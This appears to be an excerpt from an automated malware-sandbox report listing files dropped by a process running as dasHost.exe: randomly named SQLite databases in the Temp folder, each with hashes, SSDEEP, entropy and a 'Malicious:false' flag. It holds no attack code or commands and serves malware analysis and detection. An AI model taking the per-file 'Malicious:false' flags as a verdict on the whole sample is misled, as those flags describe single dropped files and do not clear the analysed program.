                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\FV560fUEgw

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Fso1nRVPnq

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\G0JBreG1nZ

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\G7DVfGrqLy

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\GOY4M4Adhe

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\GchcHTQKM2

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\GkLVey0lAc

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\GlSI4yYt1l

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\GmEBetY3vo

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\GmYNZHT0g8

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\GoWrFNObvp

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\GyHlZtAnMW

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\H1G0wwuRzC

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\HYliZonMFO

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\I7NmZDTw8g

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\IEayz3YRRP

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\IGcmZeUDer

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\IHqPJveP6F

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\IR9FBrijvN

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\IqexEKk84k

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\JJ5pUbwtrM

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\JuC6f7ixfM

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\K40wMyFLiJ

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
